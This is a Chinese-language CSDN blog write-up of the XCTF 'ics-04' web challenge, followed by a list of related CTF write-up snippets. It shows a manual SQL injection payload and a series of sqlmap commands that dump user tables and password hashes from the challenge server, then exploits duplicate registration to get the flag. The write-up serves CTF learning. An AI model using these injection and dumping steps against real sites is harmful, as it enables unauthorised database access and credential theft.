攻防世界web ics-04 writeup

最新推荐文章于 2021-08-26 17:01:08 发布
最新推荐文章于 2021-08-26 17:01:08 发布
阅读量210 收藏
点赞数
分类专栏: Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45837896/article/details/107875185
版权

还是这一套管理系统,而这次能够点开的页面是登录和注册页面,如下
在这里插入图片描述
在这里插入图片描述首先注册并登录发现
在这里插入图片描述
没有什么显著的效果,然后怀疑的是登录或者注册框存在sql注入漏洞,但是发现并没有,然而注册页面存在一个同用户名可以重复注册的漏洞

点击忘记密码可以引导到一个修改密码的页面
在这里插入图片描述
在这个页面尝试手工注入

 'or 1=1#

发现可以注入
在这里插入图片描述于是决定使用sqlmap在该页面进行注入
用我们刚注册的用户发送POST

sqlmap -u "http://220.249.52.133:56810/findpwd.php" --data "username=123" --dbs

在这里插入图片描述
发现几个数据库,其中cetc004应该就是当前云控中心的数据库

 sqlmap -u "http://220.249.52.133:56810/findpwd.php" --data "username=123" -D cetc004 --tables

在这里插入图片描述
发现一个用户表,对其进行查看

sqlmap -u "http://220.249.52.133:56810/findpwd.php" --data "username=123" -D cetc004 -T user --columns

在这里插入图片描述
可以发现密保问题,密码,密保答案,用户名这几个字段,我们需要的就是用户名和密码这两项

 sqlmap -u "http://220.249.52.133:56810/findpwd.php" --data "username=123" -D cetc004 -T user -C "username,password" --dump

在这里插入图片描述
发现了三个用户,其中1和123用户都是我刚刚注册的,密码都是1和123,这里发现密码都被加密过了(看别人的wp了解到是md5加密)

这里利用注册页面可以重复注册的漏洞,对原本存在的一个用户进行重复注册
在这里插入图片描述在这里插入图片描述

flag见上

其它解法(插眼)

Sprint#51264
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界 supersqli writeup
12-14
进入题目查看源码,提到sqlmap那就扫一扫 发现有注入,注入点为injiect=2’,接下来–dbs尝试查询数据库,只爆出supersqli,但无法爆出表。 回到题目 order by 判断只有两个字段(别人的writerup说–+被过滤,只能使用#,不知道为什么没有,最后发现是在查询框里过滤了,在url框里没有) 在使用union select时发现过滤关键字 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200313161718411.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpd
ICS bomblab
12-15
bomb lab 《深入理解计算机系统》 是理解计算机系统首选书目,是10余万程序员的共同选择。卡内基-梅隆、北京大学、清华大学、上海交通大学等国内外众多知名高校选用指定教材。从程序员视角全面剖析的实现细节,使读者深刻理解程序的行为,将所有计算机系统的相关知识融会贯通。
攻防世界--web高级writeup
Vinson的博客
09-22 888
根据大佬们的writeup做出来后,自我整理下知识点及分类 目录 mfw git泄露 NaNNaNNaNNaN-Batman js代码审计 PHP2--phps web2--加密解密 分析其中的PHP内置函数 mfw git泄露 注意 page=about ,可以传数据 且用git写可能有git泄露 传flag为空,代表有文件,如果报错,是没有 git泄露 ...
攻防世界misc新手_攻防世界[Web]-新手练习
weixin_39700220的博客
11-21 166
简单地记录一下自己做题的WriteUp。01 View SourceX老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。打开题目之后,发现的确鼠标右键没有反应。但是F12依然有用,能查看网页代码。就看到了Flag。02 RobotsX老师上课讲了robots协议,小宁同学却上课打了瞌睡,赶紧来教教小宁Robots协议是什么吧。去网上搜了一下robots协议,大概了解了一下是个...
攻防世界web ics-05 writeup
qq_45837896的博客
08-08 192
考点: 文件包含 PHP伪协议 preg_replace函数/e模式下,函数将把replace中php代码直接执行 如题: 又是熟悉的管理系统,这次是设备维护中心出了差错 要注意刚点进去是什么都没有的,但是经过一番摸索点击左上角的云平台设备维护中心会出现一个新页面 虽然长得样子差不多但是url后多了一个page参数 更改参数发现显示的字样会根据url的修改而更改,起初以为是xss攻击,但是看了前辈的博客发现是文件包含漏洞,附上LFI漏洞判断 LFI漏洞的黑盒判断方法: 单纯的从URL判断的话,UR
2019.4 DDCTF web题--滴 writeup
04-14
DDCTF,2019年4月比赛,web题,第一题--滴 writeup,及flag。
2022-工大抗疫-web-writeup1
08-03
2022-工大抗疫-web-writeup1 本资源摘要信息聚焦于Web安全和网络协议相关知识点,涵盖了HTML、PHP、网络协议和Windows操作系统等多个方面。 一、网络协议 在Web开发中,网络协议扮演着重要角色。HTTP/1.1是目前最...
GKCTF2021-官方WriteUp.pdf
07-06
GKCTF2021-官方WriteUp.pdf
D3CTF2022-官方WriteUp1
08-03
本文将对 D3CTF 2022 官方 WriteUp1 进行总结,主要涉及 MySQL UDF 提权、Java 反序列化、MySQLInject、Web 短链技术等多方面的知识点。 1. MySQL UDF 提权 在 MySQL 中,可以使用 User-Defined Functions(UDF)...
攻防世界web高手进阶php_rce,[CTF]攻防世界web高手进阶区Writeup(更行ing)
weixin_42531396的博客
03-09 144
baby_webEMMMM,这就是一个签到题~解题方法:F12→Networks→刷新抓包→完成Training-WWW-Robots看题目可以知道这道题考的是爬虫协议(robots.txt文件)的知识打开网页,果然~他在网页里还暗示了一下,Sometimes these files reveal the directory structure instead protecting the con...
攻防世界xctf web进阶ics_05writeup
qq_43370221的博客
04-19 320
文章目录isc_05利用PHP伪协议来得到index.php的源码利用 preg_replace漏洞抓包改包&利用get来构造参数 isc_05 检索网页 发现只有一个页面可以打开 发现了类似文件包含的url 可以猜测page是通过get传入了一个文件 ,所以尝试文件包含。又因为index.php页面存在异常 所以尝试读入index.php 利用PHP伪协议来得到index.php的...
攻防世界-web-backup-Writeup
baola的博客
06-16 359
攻防世界-web-backup 源码泄露由于网站开发人员忘记删除备份文件,直接上线项目,这对网站来说具有很大的安全隐患,攻击者可以通过下载泄露的源码备份文件,查看源码,从而进行信息收集。
攻防世界web高手进阶区ics-05(XCTF 4th-CyberEarth)WriteUp
D-R0s1的博客
08-04 4965
解题部分 题目来源 攻防世界web高手进阶区ics-05(XCTF 4th-CyberEarth) 1.拿到题目以后,发现是一个index.php的页面,并且设备…没有显示完全,此位置可疑。 2.源代码中发现?page=index,出现page这个get参数,联想到可能存在文件包含读源码的漏洞,尝试读取index.php的页面源码 通过php内置协议直接读取代码 /index.php?page=p...
攻防世界Web mfw writeup
qq_45837896的博客
08-15 239
题目的环境是一个自己搭建的网站 点击上方几个选项可以进入不同的页面 1.观察到进入其他页面的时候url传了一个叫做page的参数,怀疑这里可能有可以操作的点 看到About的选项时,发现作者介绍说开发网站的时候用到了Git 2.于是考虑这里存在git源码泄露 使用GitHack对该网站.git文件进行下载 GitHack下载地址 得到这么几个文件 templates文件夹里 flag.php里面什么也没有 看了看同目录下的其它几个也没有什么收获,于是返回去看index.php 发现一段重要的代码,
攻防世界web NewsCenter writeup
qq_45837896的博客
07-11 251
进入在线场景 首先有报错信息,可以了解到可能要使用sql注入相关知识,因为涉及到数据库。 根据题目描述刷新页面进入: 有搜索框和从数据库里调出来的内容。 尝试使用工具sqlmap 在搜索框进行输入并用burpsuite进行抓包 把抓包得到的http头存至桌面随意命名为3.txt 接着用终端打开桌面开始输入sqlmap命令 先查看其所有的数据库 1.sqlmap -r 3.txt -dbs 看到有两个数据库,第一个是MySQL自带数据库,所以第二个库里可能会有想要的信息 2.sqlmap -r 3.
攻防世界部分web题:Writeup
Sy0ung_的博客
05-21 262
打开网址,发现flag按钮不能点,想到和html按钮可能有关 按F12看源码, 把disabled删掉,flag按钮自动点亮,点击得到flag
攻防世界XCTF:ics-04
末初的CSDN博客
03-13 1103
有三个可以访问的地方,注册,登录和找回密码 注册功能:没有sql注入,但是测试出一个账号可以重复注册 登录功能:也没有sql注入,一个账号能够使用不同的面登录 找回密码页面存在SQL注入 sqlmap扫一波 记住需要指定参数 python2 sqlmap.py -u "http://111.198.29.45:33573/findpwd.php" --data="username=1" ...
XCTF攻防世界WebWriteUp
weixin_30692143的博客
06-27 585
XCTF攻防世界WebWriteUp 0x00 准备 【内容】 在xctf官网注册账号,即可食用。 【目录】 目录 0x01 view-source2 0x02 get post3 0x03 robots4 0x04 backup6 0x05 Cookie7 0x06 disabled button8 0x07 simple js9 0x08 XFF Refe...
攻防世界 web新手练习区WP(超新新手!)
寻同学的博客
08-26 902
攻防世界 web新手练习区WP(超新新新手!)(持续更新中) 看了看自己的博客,发现最近几年学什么发什么博客都是半途而废????,怎么肥四哇,给自己一个差差差评。 最近工作需要,又开始了新的一波学习。开始在攻防世界上面刷一些最简单最基础的题目,在这边记录一下吧,希望这一次的学习和记录能多坚持一段时间鸭~~ 以下为正文: 1.view_source 打开题目场景链接后如下图 按F12查看源代码,如下图 可以直接看到flag为cyberpeace{bcfce52ec705e8a28365b795cbd93
攻防世界shuffle
最新发布
09-03
- *3* [攻防世界Reverse进阶区-Shuffle-writeup](https://blog.csdn.net/qq_35056292/article/details/108676766)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值